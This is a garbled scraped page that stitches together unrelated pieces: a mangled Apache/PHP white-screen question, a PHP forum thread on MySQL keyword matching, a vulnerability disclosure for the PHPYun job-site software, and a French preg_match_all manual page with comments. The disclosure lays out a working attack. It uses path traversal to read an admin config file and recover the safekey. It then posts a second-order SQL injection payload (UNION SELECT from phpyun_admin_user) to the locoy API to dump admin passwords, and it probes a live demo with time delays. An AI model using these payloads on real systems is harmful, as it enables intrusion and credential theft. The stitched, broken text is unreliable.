php神盾解密怎么使用splitword.php

羽毛球技术 | 体育赛事 | 英文歌曲 | 住宅风水 | 用户界面设计师 | 六爻 | 书籍改编电影 | 德国足球甲级联赛 | 欧美明星 | PLC | 中国足球 | aj1 | 国家队 | 拜仁慕尼黑足球俱乐部 | 小说创作 | 配音 | iOS应用 | NBA 2K | 古典音乐 | 面相 | 火影忍者 | 武汉大学 | 土拨鼠 | 营销策划 | 秦时明月之天行九歌 | 设计师 | 巴塞罗那足球俱乐部 | 尤文图斯 | 实况足球（游戏） | 少帅 | 罗玉凤 | 比利时 | 跑鞋 | 冷知识 | 肖战 | 李元胜 | 古琴 | 按键精灵 | 罗兰 | 徐波 | 激光手术 | 角色扮演 | 关晓彤 | 微电影 | safari | 北京国安 | 古汉语 | 曼彻斯特联 | 玄幻小说 | 科幻小说 | 双眼皮手术 | 主题曲 | 年会 | 检测仪 | 徒步 | 互联网公司 | 百度输入法 | 镜头 | 宜昌市 | 自拍 | 金蝶 | 电子烟 | 网站建设 | 广播体操 | 文身 | nba篮球 | 索尼(sony) | 天体物理学 | 痛风 | 象棋 | 牛皮癣 | 皮肤护理 | 周星驰（人物） | 试管婴儿 | 亚足联亚洲杯（AFC Asian Cup） | 健美 | 美术生 | 迅雷（软件） | 战斗机 | 穿越小说 | 张璐 | 姓氏 | 诸葛亮 | 后宫·甄嬛传（书籍） | 虎牙直播 | snh48 | 阿迪达斯 | 投影仪 | 组装机 | 微信群 | 阿迪达斯(adidas) | 网球王子 | 分子生物学 | 耽美 | 武磊 | 婚礼 | 表演 | 中国武术 | 动画电影 | Air Jordan | 张子枫 | 免费软件 | 相声演员 | 摩羯座 | 宿舍 | ansys | 法国足球甲级联赛 | 户外 | 剧场版 | 杨凡 | 科幻电影 | galgame | 融资 | 关节炎 | NBA季后赛 | 神话 | 王力宏（人物） | 建模 | 计算机病毒 | 广州恒大淘宝足球俱乐部 | 北京奥运会 | 电脑电源 | 百度翻译 | 字幕 | 讯飞输入法 | 海关 | 易烊千玺 | 深度学习 | 编辑器 | 澳门特别行政区 | 直播 | 流氓软件 | 事故 | 大片 | 李景亮 | 郭富城 | 日语歌曲 | 卡牌游戏 | 小品 | 东京 | 花卉 | 音乐剧 | 互联网创业 | 占卜 | 羽毛球拍 | 婆媳关系 | 日本动画 | 巴黎 | 拳击比赛 | 东南亚 | 足球经理（FM）（游戏） | youtube | 胡歌（演员） | 地铁跑酷 | 植发 | 张继科 | 三国 | 用户界面 | 演技 | 百度竞价 | 青梅竹马 | 移动硬盘 | 韩晓鹏 | 马龙 | 瘦腿 | 宠物医疗 | 巨蟹座 | 徐峥 | 天蝎座 | 胸肌 | 赵丽颖（演员） | adidas阿迪达斯 | 低音炮 | 星际争霸（游戏） | 豆瓣电影 | 微信开放平台 | 手绘 | 吉他学习 | 江苏卫视 | 模特 | 创意 | 团队管理 | 奢侈品 | 王源 | TANK | 笛子 | 偶像 | 莱斯特城 | 维生素 | 新百伦 | 国际物流 | 前女友 | 李小龙 | 华语流行音乐 | 猎头公司 | crm | 搏击项目 | 网站运营 | 鼻炎 | 篮球游戏 |

你的位置：网站首页 >> 频道首页 >>PHP >>php神盾解密怎么使用splitword.php

php神盾解密怎么使用splitword.php

来源：蜘蛛抓取(WebSpider) 时间：2016-03-19 10:22 标签： php源码怎么使用

apache+php+mysql的白屏问题_百度知道
apache+php+mysql的白屏问题
/if (bcheckLibExists($default-&gt：Nlib&#47，还是会定时出现白屏;ini_set(');config/intranet&#92.&$out = ob_get_clean();lib&#47，全显示这个php文件内容;);localhost\index.28+ie8;intranet&#92环境是apache2，必定重重有赏，后来我屏蔽这个require_once后.php 前面增加了error_reporting(E_ALL).php on line 302补充，你怎么看。我隐隐感觉代码有问题.php on line 302 Nini_set(&#39.2:&#92.&quot.22+php5.php&quot.php&);;if (bcheckLibExists(dirname(__FILE__).php&config&#47.php on line 32 Notice，正常.2;owl_fs_display_startup_errors&#39：最开始没有出现白屏，元芳: Trying to get property of non-object in D;disp.php代码前几行.&quot，再用一会.php&display_errors&#39: Undefined variable，apache的logs目录的localhost\owl_fs_root 。求助各位大侠了.lib: Trying to get property of non-object in D，require_once($default-&lib_splitword_full。I，如解决.17+mysql5，日志为;htdocs\localhost&#92, &#39.lib.5;/1'owl, &#39.&quot，再访问index。我在index.&;);&#47: owl_lang in D;)) require_once(dirname(__FILE__).log没有任何日志;/);)) require_once($default-&gt，又白屏。Require加载的文件都是本地文件，重启机器后（大部分重启可以:&#92，再刷新就白屏了，界面刷新时;1'index:&#92，也有一次重启了也不行）.php&owl_fs_root ?phpob_start();intranet&#92，我增加一个分词功能;htdocs\/出现白屏后.php就会出现白屏，系统用了一会（半天内）;/htdocs&#92：&/index
我有更好的答案
查看源代码看看，是不是编码不对。
下个xdebug调试看看吧
我以前也有过这样,卸装INDEX.我是装360的
其他类似问题
39人觉得有用
为您推荐：
apache的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁第三方登录：后使用快捷导航没有帐号？
查看: 3574|回复: 13
MYSQL如何模糊匹配关键字？
象骑士-大象, 积分 372, 距离下一级还需 128 积分
现有数据库字段数据为 |饮料|咖啡|冷饮
用户输入好喝的饮料
因为数据库字段里包含有饮料两字，如何将它查询出来呢？
PHPChina社区 PHP开发者社区
象斗士-十象, 积分 534, 距离下一级还需 466 积分
给个例子，用like
[mw_shl_code=php,true]$sql=&select * from baojia&;
$action=$_GET['action'];
if($action=='change'){
&&$sql=$sql.& where adddate like '%$value%'&;
if (isset($ssid))
& && &&&{$sql=$sql.& where ssid like '%$ssid%'&;}
if (isset($wid))
& && &&&{$sql=$sql.& and wid like '%$wid%'&;}[/mw_shl_code]
PHPChina社区 PHP开发者社区
象巨人-千象, 积分 2594, 距离下一级还需 906 积分
你這裡的情況是數據庫的字段比用戶輸入的字段範圍要小，建議分詞吧
PHPChina社区 PHP开发者社区
象骑士-大象, 积分 372, 距离下一级还需 128 积分
qingyanbai 发表于
给个例子，用like
[mw_shl_code=php,true]$sql=&select * from baojia&;
like %keyword% 只能查询小于数据字段的数据，而我那个是大于，不能实现
PHPChina社区 PHP开发者社区
象斗士-十象, 积分 1051, 距离下一级还需 -51 积分
对于一般的分词应用，dedesplit已经够用了。
使用方法：
view sourceprint?
require_once &lib_splitword_full.php&;
$str = &浅析我国旅行社运作模式前景&;
$sp = new SplitWord();
echo $sp-&SplitRMM($str).&&hr /&&
$sp-&Clear();
演示地址：http://www./split.php
分词改进版已经上传，支持gbk和utf8两种编码。
PHPChina社区 PHP开发者社区
象骑士-大象, 积分 372, 距离下一级还需 128 积分
赑屃Ⅳè蚊子发表于
对于一般的分词应用，dedesplit已经够用了。
使用方法：
这个肯定不行，你试着输入临安市锦城镇大华路看&&分词一趟糊涂
PHPChina社区 PHP开发者社区
象斗士-十象, 积分 1051, 距离下一级还需 -51 积分
animo 发表于
这个肯定不行，你试着输入临安市锦城镇大华路看&&分词一趟糊涂
要求这么高。。。要是不用分词不用优化的话，我能想到的只是拿出来和“好喝的饮料”比对了。。。自己写个类呗～
PHPChina社区 PHP开发者社区
象斗士-十象, 积分 1243, 距离下一级还需 -243 积分
本帖最后由惊哲于
12:37 编辑
sql不支持这样的模糊比对
--------------
建议用php处理
[mw_shl_code=php,true]
//两个字符串相互比对
$str = &好喝的饮料&;
$store = &饮料|咖啡|冷饮|&;
$arrData= explode('|',$store);
$sumData= count($arrData);
for($i=0;$i&$sumD$i++)
& && && & $back1 = strchr($arrData[$i],$str );
& && && & $back2 = strchr($str ,$arrData[$i]);
& && && && && && && && && && &&&
& && && & //任何一个在另外一个存在,就记录
& && && & if($back1 != '' || $back2 != '')
& && && & {
& && && && && && &&&
& && && & }
& && && && && && && && && && && && && && && && && && &
[/mw_shl_code]
PHPChina社区 PHP开发者社区
mysql是没这个功能
你得自己写匹配函数
PHPChina社区 PHP开发者社区
本帖最后由 phptree 于
15:08 编辑
如果是用户写操作的时候做判断，explode成数组，然后再遍历判断应该可行吧？
PHPChina社区 PHP开发者社区
象斗士-十象, 积分 1251, 距离下一级还需 -251 积分
sphinx不是可以满足的吗
PHPChina社区 PHP开发者社区
象宝宝-小象, 积分 84, 距离下一级还需 16 积分
本帖最后由 ikasa007 于
15:50 编辑
好吧也许你可以反过来进行匹配，先把数据库相关字段取出来，将所有字段和输入的字符串进行一一匹配或截取。如果成功再去查该字段的数据，听起来不复杂呢！呵呵
PHPChina社区 PHP开发者社区
象宝宝-小象, 积分 84, 距离下一级还需 16 积分
好吧也许你可以反过来进行匹配，先把数据库相关字段取出来，将所有字段和输入的字符串进行一一匹配或截取。如果成功再去查该字段的数据，听起来不复杂呢！呵呵
PHPChina社区 PHP开发者社区
象天使-万象, 积分 4210, 距离下一级还需 790 积分
_熊出没注意-.- 发表于
sphinx不是可以满足的吗
没用过sphinx，这次好好学习一下
PHPChina社区 PHP开发者社区
工作时间：周一至周五(08:30~18:00)
官方微信二维码
官方微博二维码分享漏洞：
披露状态：
：细节已通知厂商并且等待厂商处理中
：厂商已经确认，细节仅向厂商公开
：细节向第三方安全合作伙伴开放（、、）
：细节向核心白帽子及相关领域专家公开
：细节向普通白帽子公开
：细节向实习白帽子公开
：细节向公众公开
简要描述：
的对之前的绕过过滤的那里也稍微改了下。。
这个改了依旧能直接绕过无限制。
可以直接出管理的密码啥的。本地直接出管理密码了,demo测试。。
因为demo有安全狗。不会搞安全狗。就直接延个时了。。
详细说明：
http://**.**.**.**/company/index.php?m=index&c=index&id=3751&style=../../template/admin&tp=/admin_web_config
可以发现现在打开是空白了。。来看看代码。
在conpany/model/index.class.php中
code 区域$_GET['style'] = str_replace(array('.','/'),'',$_GET['style']);//原来是过滤了. 和 /
if($row['comtpl'] && $row['comtpl']!=&default& && !$_GET['style']){
$tplurl=$row[comtpl];
$this-&registrs();
$tplurl=&default&;
if($_GET['style']){
$tplurl=$_GET['style'];
$tp=$_GET['tp']?$_GET['tp']:&index&;
$this-&public_action();
$this-&yunset(&msglist&,$msglist);
$this-&yunset(&usertype&,$_COOKIE['usertype']);
$this-&yunset(&uid&,$this-&uid);
$this-&yunset(&comclass_name&,$comclass_name);
$this-&yunset(&com&,$row);
$this-&yunset(&looktype&,$looktype);
$this-&yunset(&look_msg&,$look_msg);
$this-&seo(&company_&.$tp);
$this-&yunset(&com_style&,$this-&config['sy_weburl'].&/template/company/&.$tplurl.&/&);
$this-&yunset(&comstyle&,&../template/company/&.$tplurl.&/&);
$this-&yuntpl(array('company/'.$tplurl.&/&.$tp));//不过我不怕我还有$tp
那么就继续绕过过滤进行注入。
请无视上面的。
这个是之前的了，但是还是有点问题的是。
发现phpyun生成的safekey都是一样的。
我测试了一些站发现很少有改的。
之前连demo也没改。后面被我注入了几次才改了。
推荐随机生成一个呗。咱我记得以前都是随机的。
现在都是啥72**啥的。 rand
在api\locoy\model\news.class.php中
code 区域function addnews_action(){
include(&locoy_config.php&);
if($locoyinfo['locoy_online']!=1){ //默认都为1
if($locoyinfo['locoy_key']!=trim($_GET['key'])){//默认为phpyun 基本没改的。
if(!$_POST['title'] || !$_POST['content'] || !$_POST['nid']){
$row=$this-&obj-&DB_select_once(&news_base&,&`title`='&.trim($_POST['title']).&' and `nid`='&.$_POST['nid'].&'&);//查询是否重复。，
if(is_array($row)){
$value=&&;
$value.=&`title`='&.trim($_POST['title']).&',&;
$value.=&`nid`='&.$_POST['nid'].&',&;
$value.=&`author`='&.$_POST['author'].&',&;
$value.=&`description`='&.$_POST['description'].&',&;
$value.=&`source`='&.$_POST['source'].&'&;
if($_POST['ctime']){
$value.=&,`datetime`='&.strtotime($_POST['ctime']).&'&;
$value.=&,`datetime`='&.time().&'&;
if($_POST['hits']){
$value.=&,`hits`='&.trim($_POST['hits']).&'&;
$row=explode('-',$locoyinfo['locoy_rand']);
if(is_array($row)){
$rand=rand(trim($row[0]),trim($row[1]));
$rand=!trim($row)?0:$
$value.=&,`hits`='&.$rand.&'&;
if($_POST['sort']){
$value.=&,`sort`='&.trim($_POST['sort']).&'&;
$row=explode('-',$locoyinfo['locoy_sort']);
if(is_array($row)){
$rand=rand(trim($row[0]),trim($row[1]));
$rand=!trim($row)?0:$
$value.=&,`sort`='&.$rand.&'&;
if($_POST['newsphoto']){
$value.=&,`newsphoto`='&.trim($_POST['newsphoto']).&'&;
if($_POST['s_thumb']){
$value.=&,`s_thumb`='&.trim($_POST['s_thumb']).&'&;
$content=$_POST['content'];
if(!$_POST['keyword'] && $locoyinfo['locoy_keyword']==1){
require(APP_PATH.&/include/lib_splitword_class.php&);
$sp = new SplitWord();
$keywordarr=$sp-&getkeyword(strip_tags($content));
$value.=&,`keyword`='&.@implode(&,&,$keywordarr).&'&;
}elseif($_POST['keyword']){
$value.=&,`keyword`='&.str_replace(&，&,&,&,$_POST['keyword']).&'&;//点点点
$new_base = $this-&obj-&DB_insert_once(&news_base&,$value);//入库了
$news_content = $this-&obj-&DB_insert_once(&news_content&, &`nbid`='$new_base',`content`='$content'&);
if($new_base){
在model/news.class.php中
code 区域function show_action()
$id=(int)$_GET['id'];
$news=$this-&obj-&DB_select_once(&news_base&,&`id`='&.$id.&'&);//这里出库了。
$row=$this-&obj-&DB_select_once(&news_content&,&`nbid`='&.$id.&'&);
$news['content']=$row['content'];
$news_last=$this-&obj-&DB_select_once(&news_base&,&`id`&'&.$id.&' order by `id` desc&);
if(!empty($news_last)){
if($this-&config[sy_news_rewrite]==&2&){
$news_last[&url&]=$this-&config['sy_weburl'].&/news/&.date(&Ymd&,$news_last[&datetime&]).&/&.$news_last['id'].&.html&;
$news_last[&url&]= $this-&Url(&index&,'news',array('c'=&'show',&id&=&$news_last[id]),&1&);
$news_next=$this-&obj-&DB_select_once(&news_base&,&`id`&'&.$id.&' order by `id` asc&);
if(!empty($news_next)){
if($this-&config[sy_news_rewrite]==&2&){
$news_next[&url&]=$this-&config['sy_weburl'].&/news/&.date(&Ymd&,$news_next[&datetime&]).&/&.$news_next['id'].&.html&;
$news_next[&url&]= $this-&Url(&index&,'news',array('c'=&'show',&id&=&$news_next[id]),&1&);
$class=$this-&obj-&DB_select_once(&news_group&,&`id`='&.$news['nid'].&'&);
if($news[0][&keyword&]!=&&)//如果查询出来的关键字不为空
$keyarr = @explode(&,&,$news[&keyword&]);//这里用逗号来切割关键字。那么意味着不能使用逗号了。
if(is_array($keyarr) && !empty($keyarr))
foreach($keyarr as $key=&$value)
$sqlkeyword[]= & `keyword` LIKE '%$value%'&;//把查询出来的又拼接进来了, 那么意味着可以引入单引号了。
$sqlkw = @implode(&OR&,$sqlkeyword);
$about=$this-&obj-&DB_select_all(&news_base&,& 1 AND
($sqlkw) AND `id`&&'&.$id.&' order by `id` desc limit 6&);//查询
if(is_array($about)){
foreach($about as $k=&$v){
if($this-&config[sy_news_rewrite]==&2&){
$about[$k][&url&]=$this-&config['sy_weburl'].&/news/&.date(&Ymd&,$v[&datetime&]).&/&.$v['id'].&.html&;
$about[$k][&url&]= $this-&Url(&index&,'news',array('c'=&'show',&id&=&$v[id]),&1&);
$data['news_title']=$news['title'];
$data['news_keyword']=$news['keyword'];
$data['news_author']=$news['author'];
$data['news_source']=$news['source'];
$data['news_class']=$class['name'];
$data['news_desc']=$this-&obj-&GET_content_desc($news['description']);
$this-&data=$
$info[&news_class&]=$class['name'];
$info[&last&]=$news_
$info[&next&]=$news_
$info[&like&]=$
$this-&yunset(&Info&,$info);//这里直接回显出来。
因为是二次注入如果使用盲注的话二次注入会非常的麻烦。
所以还是要想办法联合查询。
然后构造一下因为主语句中有16个列所以要16个。
%') and 1=2 UNION SELECT * FROM
((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN(SELECT 4)d JOIN (SELECT 5)e JOIN (SELECT 6)f JOIN (SELECT 7)g JOIN (SELECT 8)h JOIN (SELECT 9)i JOIN (SELECT 10)j JOIN (SELECT 11)k JOIN (SELECT 12)l JOIN (SELECT 13)m JOIN (SELECT 14)n JOIN (SELECT 15)o JOIN (a 16)p)#
后面发现数据库没存储完。
| varchar(200) | NO
去看了下数据库才发现keyword这个列只能储存200个字符但是我们上面那个语句都已经300了。。所以要想办法缩短到200.
后面我看了一下管理表 phpyun_admin_user 有8个列。
那我们再构造一下
') and 1=2 union select * from phpyun_admin_user join (select 1)a join (select 2)b join (select 2)c join (select 3)d join (select 4) e join(select 5)f join(select 6)g join (select 7)o join(select 8)p#
code 区域mysql& select length('\') and 1=2 union select * from phpyun_admin_user join (se
lect 1)a join (select 2)b join (select 2)c join (select 3)d join (select 4) e jo
in(select 5)f join(select 6)g join (select 7)o join(select 8)p#');
+-------------------------------------------------------------------------------
--------------------------------------------------------------------------------
------------------------------------------------------+
| length('\') and 1=2 union select * from phpyun_admin_user join (select 1)a joi
n (select 2)b join (select 2)c join (select 3)d join (select 4) e join(select 5)
f join(select 6)g join (select 7)o join(select 8)p#') |
+-------------------------------------------------------------------------------
--------------------------------------------------------------------------------
------------------------------------------------------+
我勒个擦这运气也太好了把。。刚好200个字符。。
然后来测试。
http://web/web/phpyun1226/api/locoy/index.php/admin/?m=news&c=addnews&key=phpyun
title=xa&content=xxax&nid=555&keyword=') and 1=2 union select * from phpyun_admin_user join (select 1)a join (select 2)b join (select 2)c join (select 3)d join (select 4) e join(select 5)f join(select 6)g join (select 7)o join(select 8)p#&safekey=939ab244bfc16c6013fadef6e6ecc702
返回1 添加成功。
然后访问最后一个id的新闻这里我们只需要把id写得很大
http://web/web/phpyun1226/index.php?m=news&c=show&id=21
然后会提示上一个新闻点进去就是我们的新闻了。
直接出数据。。
这里再用demo演示一下。
这里看到被拦截了这里我们拿一下safekey
http://**.**.**.**/company/index.php?m=index&c=index&id=3751&style=index&tp=../../../template/admin/admin_web_config
这样绕过过滤直接拿safekey
然后计算一下safekey
可以看到用计算出来的saefkey 又绕过了过滤。。
但是我过不了demo的安全狗我擦擦擦擦擦。这里我延时一个把。
返回1添加成功。
http://**.**.**.**/index.php?m=news&c=show&id=457 //延时了的
http://**.**.**.**/index.php?m=news&c=show&id=450 //普通的
可以发现明显时间不同。。
漏洞证明：
修复方案：
出库过滤。
版权声明：转载请注明来源 @
厂商回应：
危害等级：中
漏洞Rank：10
确认时间： 14:08
厂商回复：
感谢提供！
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(少于3人评价):
登陆后才能进行评分
雨神啥时候高考？
我擦。。没搞错吧，，
这个是很久以前的了。。
当时没审核，
现在都修复了
@′雨。那还不好好学习，还来挖洞。这是已经被报送了的节奏么
这是好久前的了，:-(
妈蛋刚破400的学渣。
@′雨。很久以前？显示的提交时间是今天啊
用爪机敲了几个字上去。。
来帮忙更新下
之前提交的，现在过审核嘛。
登录后才能发表评论，请先Keyboard Shortcuts?
Next menu item
Previous menu item
Previous man page
Next man page
Scroll to bottom
Scroll to top
Goto homepage
Goto search(current page)
Focus search box
Change language:
Brazilian Portuguese
Chinese (Simplified)
preg_match_all
preg_match_all & Expression rationnelle globale
Description
int preg_match_all
( string $pattern
, string $subject
[, array &$matches
[, int $flags = PREG_PATTERN_ORDER
[, int $offset = 0
Après avoir trouvé un premier résultat, la recherche continue jusqu'à
la fin de la cha?ne.
Liste de paramètres
Le masque à chercher, sous la forme d'une .
La cha?ne d'entrée.
Tableau contenant tous les résultats, dans un tableau multidimensionnel ordonné
suivant le paramètre flags.
Peut prendre une des deux valeurs suivantes
(notez bien qu'il est incohérent d'utiliser
PREG_PATTERN_ORDER avec
PREG_SET_ORDER ) :
PREG_PATTERN_ORDER
L'ordre est tel que $matches[0] est un tableau qui
contient les résultats qui satisfont le masque
complet, $matches[1] est un tableau qui contient les
résultats qui satisfont la première
parenthèse capturante, etc.
L'exemple ci-dessus va afficher :
&b&exemple : &/b&, &div align=left&ceci est un test&/div&
exemple : , ceci est un test
Ainsi, $out[0] est un tableau qui contient les résultats qui
satisfont le masque complet, et $out[1] est un tableau qui contient
les balises entre & et &.
PREG_SET_ORDER
Les résultats sont classés de telle fa?on que $matches[0]
contient la première série de résultats, $matches[1] contient
la deuxième, etc.
L'exemple ci-dessus va afficher :
&b&exemple : &/b&, exemple :
&div align=&left&&ceci est un test&/div&, ceci est un test
PREG_OFFSET_CAPTURE
Si cette option est activée, toutes les sous-cha?nes qui satisfont
le masque seront aussi identifiées par leur offset. Notez que cela
modifie le format de la valeur retournée, puisque chaque élément
de réponse devient un tableau contenant la sous-cha?ne résultat
à l'index 0 et l'index de celle-ci dans
la cha?ne subject à l'index 1.
Si order est omis,
PREG_PATTERN_ORDER est utilisé par défaut.
Normalement, la recherche commence au début de la cha?ne
subject. Le paramètre optionnel
offset peut être utilisé pour spécifier
une position pour le début de la recherche (en octets).
Utiliser le paramètre offset ne revient pas
à passer substr($subject, $offset) à
preg_match_all() à la place de la cha?ne
subject, car
pattern peut contenir des assertions comme
(?&=x). Lisez la documentation
sur la fonction
pour des exemples.
Valeurs de retour
Retourne le nombre de résultats qui satisfont le masque
complet, ou FALSE si une erreur survient.
Historique
Exemple #1 Extraction de tous les numéros de téléphone d'un texte
&?phppreg_match_all("/$?&&(\d{3})?&&$?&&(?(1)&&[\-\s]&)&\d{3}-\d{4}/x",&&&&&&&&&&&&&&&&"Call&555-1212&or&1-800-555-1212",&$phones);?&
Exemple #2 Recherche les couples de balises HTML (gourmand)
&?php//&Cet&exemple&utilise&les&références&arrières&(\\2).//&Elles&indiquent&à&l'analyseur&qu'il&doit&trouver&quelque&chose&qu'il//&a&déjà&repéré&un&peu&plus&t?t//&le&nombre&2&indique&que&c'est&le&deuxième&jeu&de&parenthèses//&capturante&qui&doit&être&utilisé&(ici,&([\w]+)).//&L'antislash&est&nécessaire&ici,&car&la&cha?ne&est&entre&guillemets&doubles$html&=&"&b&texte&en&gras&/b&&a&href=howdy.html&cliquez&moi&/a&";preg_match_all("/(&([\w]+)[^&]*&)(.*?)(&\/\\2&)/",&$html,&$matches,&PREG_SET_ORDER);foreach&($matches&as&$val)&{&&&&echo&"matched:&"&.&$val[0]&.&"\n";&&&&echo&"part&1:&"&.&$val[1]&.&"\n";&&&&echo&"part&2:&"&.&$val[2]&.&"\n";&&&&echo&"part&3:&"&.&$val[3]&.&"\n";&&&&echo&"part&4:&"&.&$val[4]&.&"\n\n";}?&
L'exemple ci-dessus va afficher :
matched: &b&texte en gras&/b&
part 3: texte en gras
part 4: &/b&
matched: &a href=howdy.html&cliquez moi&/a&
part 1: &a href=howdy.html&
part 3: cliquez moi
part 4: &/a&
Exemple #3 Utilisation d'un sous-masque nommé
&?php$str&=&&&&FOOa:&1b:&2c:&3FOO;preg_match_all('/(?P&name&\w+):&(?P&digit&\d+)/',&$str,&$matches);/*&Ceci&fonctionne&également&en&PHP&5.2.2&(PCRE&7.0)&et&suivants,&*&cependant,&la&forme&ci-dessus&est&recommandée&pour&des&raisons&*&de&compatibilités&ascendantes&*///&preg_match_all('/(?&name&\w+):&(?&digit&\d+)/',&$str,&$matches);print_r($matches);?&
L'exemple ci-dessus va afficher :
[0] =& Array
[0] =& a: 1
[1] =& b: 2
[2] =& c: 3
[name] =& Array
[1] =& Array
[digit] =& Array
[2] =& Array
Voir aussi
- Protection des caract&res sp&ciaux des expressions rationnelles
- Effectue une recherche de correspondance avec une expression rationnelle standard
- Rechercher et remplacer par expression rationnelle standard
- &Eclate une cha&ne par expression rationnelle
- Retourne le code erreur de la derni&re expression PCRE ex&cut&e
I needed a function to rotate the results of a preg_match_all query, and made this. Not sure if it exists.
&?php
function turn_array($m)
{
& & for ($z = 0;$z & count($m);$z++)
& & {
& & & & for ($x = 0;$x & count($m[$z]);$x++)
& & & & {
& & & & & & $rt[$x][$z] = $m[$z][$x];
& & & & }
& & }& &
& & return $rt;
}
?&
Example - Take results of some preg_match_all query:
Array
(
& & [0] =& Array
& & & & (
& & & & & & [1] =& Banff
& & & & & & [2] =& Canmore
& & & & & & [3] =& Invermere
& & & & )
& & [1] =& Array
& & & & (
& & & & & & [1] =& AB
& & & & & & [2] =& AB
& & & & & & [3] =& BC
& & & & )
& & [2] =& Array
& & & & (
& & & & & & [1] =& 51.1746254
& & & & & & [2] =& 51.0938416
& & & & & & [3] =& 50.5065193
& & & & )
& & [3] =& Array
& & & & (
& & & & & & [1] =& -115.5719757
& & & & & & [2] =& -115.3517761
& & & & & & [3] =& -116.0321884
& & & & )
& & [4] =& Array
& & & & (
& & & & & & [1] =& T1L 1B3
& & & & & & [2] =& T1W 1N2
& & & & & & [3] =& V0B 2G0
& & & & )
Rotate it 90 degrees to group results as records:
Array
(
& & [0] =& Array
& & & & (
& & & & & & [1] =& Banff
& & & & & & [2] =& AB
& & & & & & [3] =& 51.1746254
& & & & & & [4] =& -115.5719757
& & & & & & [5] =& T1L 1B3
& & & & )
& & [1] =& Array
& & & & (
& & & & & & [1] =& Canmore
& & & & & & [2] =& AB
& & & & & & [3] =& 51.0938416
& & & & & & [4] =& -115.3517761
& & & & & & [5] =& T1W 1N2
& & & & )
& & [2] =& Array
& & & & (
& & & & & & [1] =& Invermere
& & & & & & [2] =& BC
& & & & & & [3] =& 50.5065193
& & & & & & [4] =& -116.0321884
& & & & & & [5] =& V0B 2G0
& & & & )
)
Recently I had to write search engine in hebrew and ran into huge amount of problems. My data was stored in MySQL table with utf8_bin encoding.So, to be able to write hebrew in utf8 table you need to do&?php$prepared_text = addslashes(urf8_encode($text));?&But then I had to find if some word exists in stored text. This is the place I got stuck. Simple preg_match would not find text since hebrew doesnt work that easy. I've tried with /u and who kows what else.Solution was somewhat logical and simple... &?php$db_text = bin2hex(stripslashes(utf8_decode($db_text)));$word = bin2hex($word);$found = preg_match_all("/($word)+/i", $db_text, $matches);?&I've used preg_match_all since it returns number of occurences. So I could sort search results acording to that.Hope someone finds this useful!
The code that john at mccarthy dot net posted is not necessary. If you want your results grouped by individual match simply use:&?preg_match_all($pattern, $string, $matches, PREG_SET_ORDER);?&E.g.&?preg_match_all('/([GH])([12])([!?])/', 'G1? H2!', $matches); // Default PREG_PATTERN_ORDER// $matches = array(0 =& array(0 =& 'G1?', 1 =& 'H2!'),//& & & & & & & & & 1 =& array(0 =& 'G', 1 =& 'H'),//& & & & & & & & & 2 =& array(0 =& '1', 1 =& '2'),//& & & & & & & & & 3 =& array(0 =& '?', 1 =& '!'))preg_match_all('/([GH])([12])([!?])/', 'G1? H2!', $matches, PREG_SET_ORDER);// $matches = array(0 =& array(0 =& 'G1?', 1 =& 'G', 2 =& '1', 3 =& '?'),//& & & & & & & & & 1 =& array(0 =& 'H2!', 1 =& 'H', 2 =& '2', 3 =& '!'))?&
Here is a function that replaces all occurrences of a number in a string by the number--&?phpfunction decremente_chaine($chaine)& & {& & & & preg_match_all("/[0-9]+/",$chaine,$out,PREG_OFFSET_CAPTURE);& & & & & & for($i=0;$i&sizeof($out[0]);$i++)& & & & & & {& & & & & & & & $longueurnombre = strlen((string)$out[0][$i][0]);& & & & & & & & $taillechaine = strlen($chaine);& & & & & & & & $debut = substr($chaine,0,$out[0][$i][1]);& & & & & & & & $milieu = ($out[0][$i][0])-1;& & & & & & & & $fin = substr($chaine,$out[0][$i][1]+$longueurnombre,$taillechaine);& & & & & & & && if(preg_match('#[1][0]+$#', $out[0][$i][0]))& & & & & & & && {& & & & & & & & & & for($j = $i+1;$j&sizeof($out[0]);$j++)& & & & & & & & & & {& & & & & & & & & & & & $out[0][$j][1] = $out[0][$j][1] -1;& & & & & & & & & & }& & & & & & & && }& & & & & & & & $chaine = $debut.$milieu.$fin;& & & & & & }& & & & return $chaine;& & }?&
if you want to extract all {token}s from a string:&?php$pattern = "/{[^}]*}/";$subject = "{token1} foo {token2} bar";preg_match_all($pattern, $subject, $matches);print_r($matches);?&output:Array(& & [0] =& Array& & & & (& & & & & & [0] =& {token1}& & & & & & [1] =& {token2}& & & & ))
To count str_length in UTF-8 string i use$count = preg_match_all("/[[:print:]\pL]/u", $str, $pockets);where[:print:] - printing characters, including space\pL - UTF-8 Letter/u - UTF-8 stringother unicode character properties on
For parsing queries with entities use:
&?php
preg_match_all("/(?:^|(?&=\&(?![a-z]+\;)))([^\=]+)=(.*?)(?:$|\&(?![a-z]+\;))/i",
& $s, $m, PREG_SET_ORDER );
?&
Here's some fleecy code to 1. validate RCF2822 conformity of address lists and 2. to extract the address specification (the part commonly known as 'email'). I wouldn't suggest using it for input form email checking, but it might be just what you want for other email applications. I know it can be optimized further, but that part I'll leave up to you nutcrackers. The total length of the resulting Regex is about 30000 bytes. That because it accepts comments. You can remove that by setting $cfws to $fws and it shrinks to about 6000 bytes. Conformity checking is absolutely and strictly referring to RFC2822. Have fun and email me if you have any enhancements!&?phpfunction mime_extract_rfc2822_address($string){& & & & $crlf& & & & && = "(?:\r\n)";& & & & $wsp& & & & & & = "[\t ]";& & & & $text& & & & && = "[\\x01-\\x09\\x0B\\x0C\\x0E-\\x7F]";& & & & $quoted_pair& & = "(?:\\\\$text)";& & & & $fws& & & & & & = "(?:(?:$wsp*$crlf)?$wsp+)";& & & & $ctext& & & & & = "[\\x01-\\x08\\x0B\\x0C\\x0E-\\x1F" .& & & & & & & & & & & & & "!-'*-[\\]-\\x7F]";& & & & $comment& & & & = "(\$(?:$fws?(?:$ctext|$quoted_pair|(?1)))*" .& & & & & & & & & & & & & "$fws?\$)";& & & & $cfws& & & & && = "(?:(?:$fws?$comment)*(?:(?:$fws?$comment)|$fws))";& & & & $atext& & & & & = "[!#-'*+\\-\\/0-9=?A-Z\\^-~]";& & & & $atom& & & & && = "(?:$cfws?$atext+$cfws?)";& & & & $dot_atom_text& = "(?:$atext+(?:\\.$atext+)*)";& & & & $dot_atom& & && = "(?:$cfws?$dot_atom_text$cfws?)";& & & & $qtext& 